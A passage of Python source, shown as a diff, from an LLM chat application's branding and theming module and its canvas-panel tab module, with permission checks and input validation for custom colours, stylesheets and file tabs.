|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import logging
|
||||
import re
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from lembas.services import settings_store
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
BRANDING = settings_store.BRANDING
|
||||
|
||||
DEFAULT_NAME = "LLeMbas"
|
||||
|
||||
# --- Flavour ------------------------------------------------------------------
|
||||
# Every Middle-earth string in the interface, with its current wording as the
|
||||
# default. Keyed rather than positional so a template names what it wants, and
|
||||
# a key nobody has overridden costs nothing to store.
|
||||
#
|
||||
# The label is what the admin page calls the field; the hint says where it is
|
||||
# seen, because a string with no context is one nobody can safely rewrite.
|
||||
FLAVOUR: dict[str, tuple[str, str, str]] = {
|
||||
"login_tagline": (
|
||||
"Under the sign-in mark",
|
||||
"The one line on the sign-in page, beneath the name.",
|
||||
"Waybread for the long road of thought.",
|
||||
),
|
||||
"chat_empty": (
|
||||
"Empty chat",
|
||||
"Above the composer on a chat with nothing in it yet.",
|
||||
"Speak, friend, and enter.",
|
||||
),
|
||||
"offline_title": (
|
||||
"Offline heading",
|
||||
"The page the service worker shows when the server cannot be reached.",
|
||||
"No road from here",
|
||||
),
|
||||
"offline_line": (
|
||||
"Offline line",
|
||||
"Beneath that heading. The sentence below it is functional and is not "
|
||||
"editable here.",
|
||||
"The Road goes ever on and on — but not without a connection.",
|
||||
),
|
||||
"error_403": (
|
||||
"403 — not yours",
|
||||
"Shown on a page somebody is not allowed to see.",
|
||||
"Speak, friend, and enter. This door is not yours to open.",
|
||||
),
|
||||
"error_404": (
|
||||
"404 — not found",
|
||||
"Shown on a page that does not exist.",
|
||||
"Not all those who wander are lost. This page, however, is.",
|
||||
),
|
||||
"error_500": (
|
||||
"500 — something broke",
|
||||
"Shown when something went wrong on the server.",
|
||||
"The Road goes ever on, but this stretch of it has washed out.",
|
||||
),
|
||||
"theme_moria": (
|
||||
"Dark theme name",
|
||||
"What the built-in dark theme is called, in the settings screen and in "
|
||||
"the /theme command.",
|
||||
"Moria",
|
||||
),
|
||||
"theme_shire": (
|
||||
"Light theme name",
|
||||
"What the built-in light theme is called.",
|
||||
"Shire",
|
||||
),
|
||||
}
|
||||
|
||||
# --- Themes -------------------------------------------------------------------
|
||||
# The two built-ins. `css` is empty for both: their tokens are declared in
|
||||
# tokens.css, which is the one place colours live, and duplicating them here so
|
||||
# that a custom theme could "inherit" would be exactly the second copy that
|
||||
# rule exists to prevent. A custom theme inherits by naming a base instead --
|
||||
# see `theme_css` below.
|
||||
SCHEME_DARK = "dark"
|
||||
SCHEME_LIGHT = "light"
|
||||
|
||||
BUILT_IN = (
|
||||
("moria", SCHEME_DARK, "#101317"),
|
||||
("shire", SCHEME_LIGHT, "#F6F1E4"),
|
||||
)
|
||||
|
||||
# What a custom theme may set. A curated handful rather than every token a
|
||||
# theme block declares: sixty colour pickers is not a feature, and everything
|
||||
# left out inherits from the base, which is what makes a theme that changes
|
||||
# four things four things long.
|
||||
#
|
||||
# `--accent-soft`, `--leaf-soft` and `--danger-soft` are deliberately absent and
|
||||
# are derived instead: they are the same colour at 14% and an administrator who
|
||||
# changed the accent without them would get focus rings in the old hue, which
|
||||
# looks like the setting half-working.
|
||||
THEME_TOKENS: tuple[tuple[str, str], ...] = (
|
||||
("bg", "Page background"),
|
||||
("bg-sunken", "Behind the page — the sidebar and panel gutters"),
|
||||
("surface", "Cards, menus and the composer"),
|
||||
("surface-raised", "Anything sitting on a surface"),
|
||||
("surface-hover", "A surface under the pointer"),
|
||||
("border", "Ordinary borders"),
|
||||
("border-strong", "Borders that have to be seen"),
|
||||
("ink", "Body text"),
|
||||
("ink-muted", "Secondary text"),
|
||||
("ink-faint", "Hints and timestamps"),
|
||||
("accent", "Links, focus and interactive accents"),
|
||||
("accent-hover", "The accent under the pointer"),
|
||||
("accent-ink", "Text on top of the accent"),
|
||||
("leaf", "The brand accent and the assistant's mark"),
|
||||
("danger", "Errors and destructive actions"),
|
||||
("success", "Confirmations and unread dots"),
|
||||
("warning", "Warnings"),
|
||||
("bubble-user", "Behind your own messages"),
|
||||
("code-bg", "Behind code"),
|
||||
)
|
||||
|
||||
THEME_TOKEN_NAMES = tuple(name for name, _ in THEME_TOKENS)
|
||||
|
||||
# A colour, and nothing else. Values reach a stylesheet, so a `}` in one would
|
||||
# end the rule and silently break every rule after it -- and `url(…)` in a
|
||||
# colour slot is a request to a third party from every page. Anything that does
|
||||
# not match is dropped rather than corrected: a colour nobody can read is a
|
||||
# setting that did not take, and that is visible, while a mangled one is not.
|
||||
_COLOUR = re.compile(
|
||||
r"^(#[0-9a-fA-F]{3,8}"
|
||||
r"|rgba?\([0-9,.\s%/]+\)"
|
||||
r"|hsla?\([0-9,.\s%/deg]+\)"
|
||||
r"|[a-z]{3,20})$"
|
||||
)
|
||||
|
||||
# An id that can be an attribute value and a CSS selector without quoting.
|
||||
_THEME_ID = re.compile(r"^[a-z][a-z0-9-]{0,23}$")
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Theme:
|
||||
"""One theme somebody can choose."""
|
||||
|
||||
id: str
|
||||
label: str
|
||||
scheme: str
|
||||
# Which built-in it starts from. A custom theme sets a handful of tokens and
|
||||
# inherits the rest, and that inheritance is a CSS fact: tokens.css matches
|
||||
# `[data-base="shire"]` as well as `[data-theme="shire"]`, so a custom light
|
||||
# theme carries `data-base="shire"` and gets the whole parchment palette
|
||||
# underneath its own four colours. Without it a light custom theme would be
|
||||
# four light colours on Moria's near-black surfaces.
|
||||
base: str = "moria"
|
||||
tokens: dict[str, str] = field(default_factory=dict)
|
||||
colour: str = ""
|
||||
built_in: bool = False
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Branding:
|
||||
"""Everything a page needs to know about whose instance this is."""
|
||||
|
||||
name: str = DEFAULT_NAME
|
||||
tagline: str = ""
|
||||
logo_path: str = ""
|
||||
favicon_path: str = ""
|
||||
icon_paths: dict[str, str] = field(default_factory=dict)
|
||||
custom_css: str = ""
|
||||
text: dict[str, str] = field(default_factory=dict)
|
||||
themes: tuple[Theme, ...] = ()
|
||||
|
||||
@property
|
||||
def theme_ids(self) -> tuple[str, ...]:
|
||||
return tuple(theme.id for theme in self.themes)
|
||||
|
||||
@property
|
||||
def theme_list(self) -> str:
|
||||
"""`id:base` pairs, space separated, for the `data-themes` attribute.
|
||||
|
||||
One attribute rather than a JSON island, because two things in the
|
||||
browser need it — `/theme` validating a name, and `applyTheme` setting
|
||||
`data-base` alongside `data-theme` — and both want a list they can split
|
||||
rather than a document they have to parse.
|
||||
"""
|
||||
return " ".join(f"{theme.id}:{theme.base}" for theme in self.themes)
|
||||
|
||||
def theme(self, theme_id: str) -> Theme:
|
||||
for theme in self.themes:
|
||||
if theme.id == theme_id:
|
||||
return theme
|
||||
return self.themes[0]
|
||||
|
||||
@property
|
||||
def revision(self) -> str:
|
||||
"""A short hash of everything `/branding.css` is built from.
|
||||
|
||||
It goes in that link's query string, so the URL changes exactly when the
|
||||
stylesheet does. Without it the browser's cache is the thing deciding
|
||||
when a rebrand takes effect, which is the failure this codebase keeps
|
||||
cataloguing: a save that looks like it worked and did nothing.
|
||||
"""
|
||||
material = repr((self.custom_css, [(t.id, t.base, sorted(t.tokens.items())) for t in
|
||||
self.themes]))
|
||||
return hashlib.sha256(material.encode("utf-8")).hexdigest()[:12]
|
||||
|
||||
|
||||
# --- Reading ------------------------------------------------------------------
|
||||
def defaults() -> dict[str, Any]:
|
||||
return {
|
||||
"instance_name": "",
|
||||
"tagline": "",
|
||||
"logo_path": "",
|
||||
"favicon_path": "",
|
||||
# Derived from the logo at save time, so a launcher gets real PNGs at
|
||||
# the sizes it asks for rather than one image the browser is told to
|
||||
# scale. Empty means the shipped artwork is used.
|
||||
"icon_paths": {},
|
||||
"custom_css": "",
|
||||
"themes": [],
|
||||
**{f"text_{key}": "" for key in FLAVOUR},
|
||||
}
|
||||
|
||||
|
||||
def _theme_from(raw: dict[str, Any]) -> Theme | None:
|
||||
"""One stored custom theme, or None if it is not usable.
|
||||
|
||||
Every field is validated on read rather than trusted from the row: a theme
|
||||
stored by an earlier version, or written straight into the settings table,
|
||||
still has to produce a stylesheet that parses.
|
||||
"""
|
||||
theme_id = str(raw.get("id") or "").strip().lower()
|
||||
if not _THEME_ID.match(theme_id) or theme_id in {name for name, _, _ in BUILT_IN}:
|
||||
return None
|
||||
base = str(raw.get("base") or "moria")
|
||||
if base not in {name for name, _, _ in BUILT_IN}:
|
||||
base = "moria"
|
||||
tokens = {
|
||||
name: value
|
||||
for name, value in (raw.get("tokens") or {}).items()
|
||||
if name in THEME_TOKEN_NAMES and _COLOUR.match(str(value).strip())
|
||||
}
|
||||
scheme = next(s for name, s, _ in BUILT_IN if name == base)
|
||||
return Theme(
|
||||
id=theme_id,
|
||||
label=str(raw.get("label") or theme_id).strip()[:60] or theme_id,
|
||||
scheme=scheme,
|
||||
base=base,
|
||||
tokens=tokens,
|
||||
colour=tokens.get("bg", ""),
|
||||
)
|
||||
|
||||
|
||||
def build(values: dict[str, Any]) -> Branding:
|
||||
"""A snapshot from a settings group. Pure, so it can be tested without a
|
||||
database and used by the preview on the admin page."""
|
||||
text = {
|
||||
key: str(values.get(f"text_{key}") or "").strip() or default
|
||||
for key, (_, _, default) in FLAVOUR.items()
|
||||
}
|
||||
themes = [
|
||||
Theme(
|
||||
id=theme_id,
|
||||
label=text[f"theme_{theme_id}"],
|
||||
scheme=scheme,
|
||||
base=theme_id,
|
||||
colour=colour,
|
||||
built_in=True,
|
||||
)
|
||||
for theme_id, scheme, colour in BUILT_IN
|
||||
]
|
||||
seen = {theme.id for theme in themes}
|
||||
for raw in values.get("themes") or []:
|
||||
if not isinstance(raw, dict):
|
||||
continue
|
||||
theme = _theme_from(raw)
|
||||
if theme is not None and theme.id not in seen:
|
||||
seen.add(theme.id)
|
||||
themes.append(theme)
|
||||
return Branding(
|
||||
name=str(values.get("instance_name") or "").strip() or DEFAULT_NAME,
|
||||
tagline=str(values.get("tagline") or "").strip(),
|
||||
logo_path=str(values.get("logo_path") or ""),
|
||||
favicon_path=str(values.get("favicon_path") or ""),
|
||||
icon_paths=dict(values.get("icon_paths") or {}),
|
||||
custom_css=str(values.get("custom_css") or ""),
|
||||
text=text,
|
||||
themes=tuple(themes),
|
||||
)
|
||||
|
||||
|
||||
_CACHE: Branding | None = None
|
||||
|
||||
|
||||
def snapshot() -> Branding:
|
||||
"""The current branding, from a process-level cache.
|
||||
|
||||
Never raises. An error page that cannot render because branding could not be
|
||||
read is a failure that hides the failure it was about to report, so a
|
||||
database that is not there yet answers with the defaults.
|
||||
"""
|
||||
global _CACHE
|
||||
if _CACHE is not None:
|
||||
return _CACHE
|
||||
try:
|
||||
from lembas.db.session import session_scope
|
||||
|
||||
with session_scope() as db:
|
||||
_CACHE = _read(db)
|
||||
except Exception: # noqa: BLE001 - defaults are a usable answer, an exception is not
|
||||
log.debug("could not read branding; using defaults", exc_info=True)
|
||||
return build(defaults())
|
||||
return _CACHE
|
||||
|
||||
|
||||
def _read(db) -> Branding:
|
||||
"""The two groups this is assembled from.
|
||||
|
||||
`instance_name` lived in the general group before there was a branding one,
|
||||
and an upgrade must not quietly rename somebody's instance back to LLeMbas.
|
||||
So the stored general value is a **seed**, and the test for it is whether the
|
||||
branding row has said anything about the name at all -- `key in row`, not
|
||||
`row[key] is truthy`. An empty stored name is somebody clearing the box,
|
||||
which has to mean the default; a *missing* one is an instance that has never
|
||||
seen this page. Reading the two the same way would resurrect the old name
|
||||
underneath a cleared one, which is the failure a cleared reasoning effort
|
||||
already documents.
|
||||
|
||||
That is why this reads the raw row rather than `get_group`, which fills in
|
||||
defaults and so cannot tell absent from empty.
|
||||
"""
|
||||
from lembas.db.models import Setting
|
||||
|
||||
values = settings_store.get_group(db, BRANDING)
|
||||
row = db.get(Setting, BRANDING)
|
||||
said = isinstance(row, Setting) and isinstance(row.value, dict) and "instance_name" in row.value
|
||||
if not said:
|
||||
legacy = settings_store.get_group(db, settings_store.GENERAL).get("instance_name")
|
||||
if legacy:
|
||||
values = {**values, "instance_name": legacy}
|
||||
return build(values)
|
||||
|
||||
|
||||
def forget() -> None:
|
||||
"""Drop the cache. Called by the admin page's save, and by tests."""
|
||||
global _CACHE
|
||||
_CACHE = None
|
||||
|
||||
|
||||
def for_db(db) -> Branding:
|
||||
"""The snapshot, seeded from a session the caller already has open.
|
||||
|
||||
Same value as `snapshot()`; this only spares the extra session on the first
|
||||
render after a restart, where one is already in hand.
|
||||
"""
|
||||
global _CACHE
|
||||
if _CACHE is None:
|
||||
_CACHE = _read(db)
|
||||
return _CACHE
|
||||
|
||||
|
||||
# --- Writing ------------------------------------------------------------------
|
||||
def stored_only(values: dict[str, Any]) -> dict[str, Any]:
|
||||
"""Blank anything equal to its shipped wording, so it is not an override.
|
||||
|
||||
The prompt-fragment rule, and the reason it is a **blank rather than a
|
||||
dropped key**: `settings_store.update` merges, so omitting a key leaves
|
||||
whatever was stored last time. Dropping one would make "I typed the default
|
||||
back in" and "I changed nothing" store different things, and make clearing a
|
||||
box do nothing at all.
|
||||
|
||||
Empty is the not-overridden marker because `build` reads `stored or
|
||||
default`. That is deliberately *not* the fragment convention, where an empty
|
||||
override means the fragment is off: a fragment being off is a state somebody
|
||||
wants, and a heading with no words is not.
|
||||
"""
|
||||
return {
|
||||
key: ("" if _is_shipped(key, value) else value) for key, value in values.items()
|
||||
}
|
||||
|
||||
|
||||
def _is_shipped(key: str, value: Any) -> bool:
|
||||
if key.startswith("text_"):
|
||||
entry = FLAVOUR.get(key[len("text_") :])
|
||||
return entry is not None and value == entry[2]
|
||||
return value == defaults().get(key)
|
||||
|
||||
|
||||
# --- The stylesheet -----------------------------------------------------------
|
||||
def _soft(colour: str, alpha: str = "0.14") -> str:
|
||||
"""A colour at low opacity, for the `*-soft` tokens.
|
||||
|
||||
Derived rather than asked for: they are the same colour at 14%, and an
|
||||
administrator who set an accent without them would get focus rings and
|
||||
selected states in the old hue -- which reads as the setting half-working
|
||||
rather than as a field they missed.
|
||||
|
||||
Only hex is understood. Anything else answers "" and the base theme's own
|
||||
soft value stands, which is the right failure: a wrong soft colour is worse
|
||||
than an unchanged one.
|
||||
"""
|
||||
value = colour.strip()
|
||||
if not value.startswith("#"):
|
||||
return ""
|
||||
digits = value[1:]
|
||||
if len(digits) == 3:
|
||||
digits = "".join(c * 2 for c in digits)
|
||||
if len(digits) not in (6, 8):
|
||||
return ""
|
||||
try:
|
||||
r, g, b = (int(digits[i : i + 2], 16) for i in (0, 2, 4))
|
||||
except ValueError:
|
||||
return ""
|
||||
return f"rgba({r}, {g}, {b}, {alpha})"
|
||||
|
||||
|
||||
def theme_css(theme: Theme) -> str:
|
||||
"""One custom theme as a rule.
|
||||
|
||||
Two selectors' worth of work in one: the block sets what was chosen, and the
|
||||
`data-base` attribute on <html> is what brings the rest of the base theme's
|
||||
palette with it. Written here and served from `/branding.css`, which loads
|
||||
after `tokens.css`, so these win on order at equal specificity.
|
||||
"""
|
||||
if not theme.tokens:
|
||||
return ""
|
||||
lines = [f" --{name}: {value};" for name, value in theme.tokens.items()]
|
||||
# Every settable colour that has a `-soft` companion in tokens.css, not the
|
||||
# three somebody stopped at. `success` and `warning` were settable and their
|
||||
# softs were not derived, so a custom theme moved the text and left the
|
||||
# background behind it in the base theme's hue -- an alert, a badge, a
|
||||
# permission's "on" state and the `+` lines of every agent diff, each in two
|
||||
# colours that were never meant to meet. Precisely the half-working failure
|
||||
# this function's own docstring says it exists to prevent.
|
||||
for name, alpha in (
|
||||
("accent", "0.14"),
|
||||
("leaf", "0.14"),
|
||||
("danger", "0.14"),
|
||||
("success", "0.14"),
|
||||
("warning", "0.14"),
|
||||
):
|
||||
soft = _soft(theme.tokens.get(name, ""), alpha)
|
||||
if soft:
|
||||
lines.append(f" --{name}-soft: {soft};")
|
||||
return f':root[data-theme="{theme.id}"] {{\n' + "\n".join(lines) + "\n}\n"
|
||||
|
||||
|
||||
def stylesheet(brand: Branding) -> str:
|
||||
"""Everything `/branding.css` serves.
|
||||
|
||||
A route rather than an inline `<style>`, and that is a security property as
|
||||
much as a caching one: an external stylesheet has no HTML context to escape
|
||||
from, so an administrator's CSS cannot become markup however it is written.
|
||||
Inline, the same text would be one `</style>` away from being a script.
|
||||
"""
|
||||
parts = [
|
||||
"/* Generated by LLeMbas from the customization settings. */",
|
||||
*(theme_css(theme) for theme in brand.themes if not theme.built_in),
|
||||
]
|
||||
if brand.custom_css.strip():
|
||||
parts += ["/* Custom CSS. */", brand.custom_css.strip(), ""]
|
||||
return "\n".join(part for part in parts if part)
|
||||
|
||||
|
||||
__all__ = [
|
||||
"BRANDING",
|
||||
"BUILT_IN",
|
||||
"DEFAULT_NAME",
|
||||
"FLAVOUR",
|
||||
"THEME_TOKENS",
|
||||
"THEME_TOKEN_NAMES",
|
||||
"Branding",
|
||||
"Theme",
|
||||
"build",
|
||||
"defaults",
|
||||
"for_db",
|
||||
"forget",
|
||||
"snapshot",
|
||||
"stored_only",
|
||||
"stylesheet",
|
||||
"theme_css",
|
||||
]
|
||||
@@ -1,480 +0,0 @@
|
||||
"""What is open in the canvas panel, and where its contents come from.
|
||||
|
||||
Six sources behind one shape. A tab key is `"<source>:<ref>"` and every source
|
||||
answers the same two questions -- load this, and save that -- through one table.
|
||||
A table rather than six branches for the reason `tool_labels.py` and
|
||||
`sharing.RESOURCE_TYPES` are tables: six independently written permission checks
|
||||
is how one of them ends up written slightly differently, and the way *that*
|
||||
failure shows up is somebody editing somebody else's note.
|
||||
|
||||
The panel is a person's own hands. A save on an `agent:` tab therefore does not
|
||||
go through `agent/policy.py`, exactly as the terminal panel and the directory
|
||||
browser do not: whoever owns the credential could write the file with `scp`.
|
||||
This is the first of those exceptions that *writes*, which is worth saying out
|
||||
loud -- Manual mode's "everything is shown to you before it happens" is a promise
|
||||
about the model, not about the interface.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import posixpath
|
||||
from dataclasses import dataclass
|
||||
from datetime import UTC
|
||||
|
||||
from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import KIND_AGENT, Attachment, Chat, SshProfile, User
|
||||
from lembas.security import permissions
|
||||
from lembas.services import scratch as scratch_service
|
||||
from lembas.services import settings_store, sharing
|
||||
from lembas.services.agent import index as index_service
|
||||
from lembas.services.agent import instructions as instructions_service
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
from lembas.services.agent.base import Conflict, ExecError, revision_of
|
||||
from lembas.services.library import documents as documents_service
|
||||
from lembas.services.library import notes as notes_service
|
||||
from lembas.services.library import skills as skills_service
|
||||
|
||||
# How many tabs a chat keeps. A model in a long reply reads forty files, and an
|
||||
# unbounded strip is a strip nobody can read -- and it would live on the chat
|
||||
# row forever. Past this the oldest tab that is not in front is dropped.
|
||||
MAX_TABS = 12
|
||||
|
||||
SOURCE_AGENT = "agent"
|
||||
SOURCE_NOTE = "note"
|
||||
SOURCE_SKILL = "skill"
|
||||
SOURCE_DOC = "doc"
|
||||
SOURCE_FILE = "file"
|
||||
SOURCE_SCRATCH = "scratch"
|
||||
|
||||
|
||||
|
||||
class Refused(Exception):
|
||||
"""This person may not have this, or it is not there any more.
|
||||
|
||||
One exception for every source, because the panel answers all of them the
|
||||
same way: a fragment saying so, in the tab, rather than an error page
|
||||
swapped into the middle of a chat.
|
||||
"""
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Doc:
|
||||
"""One open file, whatever it actually is underneath."""
|
||||
|
||||
key: str
|
||||
title: str
|
||||
subtitle: str = ""
|
||||
text: str = ""
|
||||
# An opaque token saying which version this was read at, round-tripped
|
||||
# through a hidden field so a save can refuse a file that moved underneath.
|
||||
revision: str = ""
|
||||
writable: bool = False
|
||||
# A filename or close enough, for choosing a lexer.
|
||||
language: str = ""
|
||||
markdown: bool = False
|
||||
truncated: bool = False
|
||||
binary: bool = False
|
||||
|
||||
@property
|
||||
def editable(self) -> bool:
|
||||
"""Whether the box is offered at all.
|
||||
|
||||
Not the same as `writable`. Saving back the first 256KB of a larger file
|
||||
is how the rest of it is deleted, and a binary file has nothing safe to
|
||||
put in a textarea -- both open read-only however the permissions read.
|
||||
"""
|
||||
return self.writable and not self.truncated and not self.binary
|
||||
|
||||
|
||||
def path_key(project_dir: str, path: str) -> str:
|
||||
"""One name for one file, so `./a.py` and `a.py` open the same tab.
|
||||
|
||||
The same normalisation `agent/tools.py:_path_key` applies to the read-path
|
||||
set, and lifted here so the two cannot disagree: a tab a model opened and a
|
||||
tab a person opened have to be one tab, or the panel shows the same file
|
||||
twice and only one of them is the one being saved.
|
||||
"""
|
||||
if not posixpath.isabs(path) and project_dir:
|
||||
path = posixpath.join(project_dir, path)
|
||||
return posixpath.normpath(path)
|
||||
|
||||
|
||||
def split(key: str) -> tuple[str, str]:
|
||||
"""`"agent:/srv/a:b.py"` -> `("agent", "/srv/a:b.py")`.
|
||||
|
||||
`partition`, not `split`: a path may contain a colon, and a key that lost
|
||||
half its path would silently open the wrong file.
|
||||
"""
|
||||
source, _, ref = (key or "").partition(":")
|
||||
return source, ref
|
||||
|
||||
|
||||
# --- The tab strip ---------------------------------------------------------------
|
||||
def tabs_of(chat: Chat) -> list[dict]:
|
||||
return list((chat.canvas_json or {}).get("tabs") or [])
|
||||
|
||||
|
||||
def active_of(chat: Chat) -> str:
|
||||
return str((chat.canvas_json or {}).get("active") or "")
|
||||
|
||||
|
||||
def open_tab(state: dict, tab: dict, *, activate: bool = True) -> dict:
|
||||
"""Add a tab, and optionally bring it to the front. Mutates `state`.
|
||||
|
||||
Mutating rather than returning a copy because the generation loop folds
|
||||
several of these into one snapshot within a round: two `file_read` calls
|
||||
that each read the state and wrote it back would leave only the second.
|
||||
That is the lost update `plan_update` documents, in a different place.
|
||||
|
||||
`activate=False` is what a *model* opening a tab does, and it is the whole
|
||||
of how this feature avoids being infuriating. An agent reads forty files in
|
||||
a long reply; if each one took the panel, somebody reading the third would
|
||||
be dragged through the other thirty-seven, and anybody halfway through an
|
||||
edit would lose it. So the model fills the strip and the person decides
|
||||
what is in front. A tab they open themselves activates, because opening
|
||||
something and not being shown it is the opposite failure.
|
||||
"""
|
||||
key = str(tab.get("key") or "")
|
||||
if not key:
|
||||
return state
|
||||
|
||||
tabs = [t for t in (state.get("tabs") or []) if t.get("key") != key]
|
||||
tabs.append({
|
||||
"key": key,
|
||||
"title": str(tab.get("title") or key)[:120],
|
||||
"source": str(tab.get("source") or split(key)[0]),
|
||||
})
|
||||
|
||||
# Evict from the front, and never the tab in front or the one just opened.
|
||||
# A model reading its way through a project must not close the file
|
||||
# somebody is looking at.
|
||||
keep = {key, str(state.get("active") or "")}
|
||||
while len(tabs) > MAX_TABS:
|
||||
victim = next((t for t in tabs if t["key"] not in keep), None)
|
||||
if victim is None:
|
||||
break
|
||||
tabs.remove(victim)
|
||||
|
||||
state["tabs"] = tabs
|
||||
if activate or not state.get("active"):
|
||||
# Not activating an empty panel would leave tabs with nothing in front,
|
||||
# which reads as a panel that failed to load.
|
||||
state["active"] = key
|
||||
return state
|
||||
|
||||
|
||||
def close_tab(state: dict, key: str) -> dict:
|
||||
tabs = [t for t in (state.get("tabs") or []) if t.get("key") != key]
|
||||
state["tabs"] = tabs
|
||||
if state.get("active") == key:
|
||||
state["active"] = tabs[-1]["key"] if tabs else ""
|
||||
return state
|
||||
|
||||
|
||||
def merge(stored: dict | None, live: dict | None) -> dict:
|
||||
"""Fold a reply's tabs into whatever the row says now.
|
||||
|
||||
A union rather than an overwrite. `_persist` is the single writer, and the
|
||||
snapshot it holds was taken when the reply began -- so overwriting would
|
||||
drop a tab the person opened by hand while the reply was running.
|
||||
"""
|
||||
state = {
|
||||
"tabs": list((stored or {}).get("tabs") or []),
|
||||
"active": (stored or {}).get("active") or "",
|
||||
}
|
||||
for tab in (live or {}).get("tabs") or []:
|
||||
# Never activating: what the row says is in front is what the person
|
||||
# last chose, and a reply that finishes ten minutes later must not move
|
||||
# it. The reply's own `active` is deliberately not consulted.
|
||||
open_tab(state, tab, activate=False)
|
||||
return state
|
||||
|
||||
|
||||
# --- Which sources this chat may reach ---------------------------------------------
|
||||
def agent_ready(db: DBSession, user: User, chat: Chat | None) -> SshProfile | None:
|
||||
"""The profile an `agent:` tab would use, or None.
|
||||
|
||||
Everything `_terminal_enabled` checks except `agent.terminal`. Reading and
|
||||
writing project files is what `tools.agent` is named after, and somebody who
|
||||
may have a model write a file may certainly write one themselves.
|
||||
|
||||
Re-derived on every request. The template flag of the same name is
|
||||
decoration; this is the control.
|
||||
"""
|
||||
if chat is None or chat.kind != KIND_AGENT or not chat.ssh_profile_id:
|
||||
return None
|
||||
if not permissions.has(db, user, "tools.agent"):
|
||||
return None
|
||||
if not settings_store.agents(db).get("enabled"):
|
||||
return None
|
||||
if ssh_service.available() != "":
|
||||
return None
|
||||
profile = db.get(SshProfile, chat.ssh_profile_id)
|
||||
if profile is None or profile.owner_id != user.id or not profile.enabled:
|
||||
return None
|
||||
if not profile.host_key:
|
||||
return None
|
||||
return profile
|
||||
|
||||
|
||||
def _executor(db: DBSession, user: User, chat: Chat) -> ssh_service.SshExecutor:
|
||||
profile = agent_ready(db, user, chat)
|
||||
if profile is None:
|
||||
raise Refused(
|
||||
"This chat has no connection you can reach. Check the connection's "
|
||||
"host key on the Connections page if it has not been accepted yet."
|
||||
)
|
||||
return ssh_service.SshExecutor(ssh_service.spec_from(profile), chat.project_dir)
|
||||
|
||||
|
||||
# --- Loading ------------------------------------------------------------------------
|
||||
async def _load_agent(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
|
||||
executor = _executor(db, user, chat)
|
||||
path = path_key(chat.project_dir, ref)
|
||||
try:
|
||||
found = await executor.read_text(path)
|
||||
except ExecError as exc:
|
||||
raise Refused(str(exc)) from exc
|
||||
|
||||
return Doc(
|
||||
key=f"{SOURCE_AGENT}:{path}",
|
||||
title=posixpath.basename(path) or path,
|
||||
subtitle=path,
|
||||
text=found.text,
|
||||
revision=found.revision,
|
||||
writable=True,
|
||||
language=posixpath.basename(path),
|
||||
markdown=path.lower().endswith((".md", ".markdown")),
|
||||
truncated=found.truncated,
|
||||
binary=found.binary,
|
||||
)
|
||||
|
||||
|
||||
async def _load_note(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
|
||||
_needs_library(db, user)
|
||||
note = notes_service.get(db, ref, user)
|
||||
if note is None:
|
||||
raise Refused("That note is not there any more.")
|
||||
return Doc(
|
||||
key=f"{SOURCE_NOTE}:{note.id}",
|
||||
title=note.title or "Note",
|
||||
subtitle="Note",
|
||||
text=note.body or "",
|
||||
revision=_stamp(note, note.body or ""),
|
||||
writable=sharing.can_write(note, user),
|
||||
language="note.md",
|
||||
markdown=True,
|
||||
)
|
||||
|
||||
|
||||
async def _load_skill(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
|
||||
_needs_library(db, user)
|
||||
skill = skills_service.get(db, ref, user)
|
||||
if skill is None:
|
||||
raise Refused("That skill is not there any more.")
|
||||
return Doc(
|
||||
key=f"{SOURCE_SKILL}:{skill.id}",
|
||||
title=skill.name or "Skill",
|
||||
subtitle="Skill",
|
||||
text=skill.body or "",
|
||||
revision=_stamp(skill, skill.body or ""),
|
||||
writable=sharing.can_write(skill, user),
|
||||
language="skill.md",
|
||||
markdown=True,
|
||||
)
|
||||
|
||||
|
||||
async def _load_doc(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
|
||||
_needs_library(db, user)
|
||||
document = documents_service.get(db, ref, user)
|
||||
if document is None:
|
||||
raise Refused("That document is not there any more.")
|
||||
return Doc(
|
||||
key=f"{SOURCE_DOC}:{document.id}",
|
||||
title=document.title or document.filename or "Document",
|
||||
subtitle="Knowledge document",
|
||||
text=document.extracted_text or document.extraction_error or "",
|
||||
revision=_stamp(document, document.extracted_text or ""),
|
||||
writable=documents_service.can_write(document, user),
|
||||
language=document.filename or "",
|
||||
markdown=(document.filename or "").lower().endswith((".md", ".markdown")),
|
||||
truncated=bool(document.truncated),
|
||||
)
|
||||
|
||||
|
||||
async def _load_file(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
|
||||
attachment = db.get(Attachment, ref)
|
||||
if attachment is None or attachment.user_id != user.id:
|
||||
raise Refused("That attachment is not there any more.")
|
||||
# Belonging to this conversation, so a canvas cannot browse another one's
|
||||
# files by id. `chat_id` covers one still in the composer; the message check
|
||||
# covers one that has been sent.
|
||||
if attachment.chat_id != chat.id:
|
||||
raise Refused("That attachment belongs to another chat.")
|
||||
return Doc(
|
||||
key=f"{SOURCE_FILE}:{attachment.id}",
|
||||
title=attachment.filename or "Attachment",
|
||||
subtitle=attachment.source_path or "Attachment",
|
||||
text=attachment.extracted_text or attachment.extraction_error or "",
|
||||
# Read-only, and not for want of a write path: `DELETE /api/files/{id}`
|
||||
# already refuses once the attachment has been sent, because it would
|
||||
# rewrite a message somebody already read. Editing is the same act with
|
||||
# a quieter failure.
|
||||
writable=False,
|
||||
language=attachment.filename or "",
|
||||
markdown=(attachment.filename or "").lower().endswith((".md", ".markdown")),
|
||||
truncated=bool(attachment.truncated),
|
||||
)
|
||||
|
||||
|
||||
async def _load_scratch(db: DBSession, user: User, chat: Chat, ref: str) -> Doc:
|
||||
if ref != chat.id:
|
||||
raise Refused("That scratch document belongs to another chat.")
|
||||
doc = scratch_service.for_chat(db, chat)
|
||||
return Doc(
|
||||
key=f"{SOURCE_SCRATCH}:{chat.id}",
|
||||
title=doc.title or "Scratch",
|
||||
subtitle="This chat's scratch document",
|
||||
text=doc.body or "",
|
||||
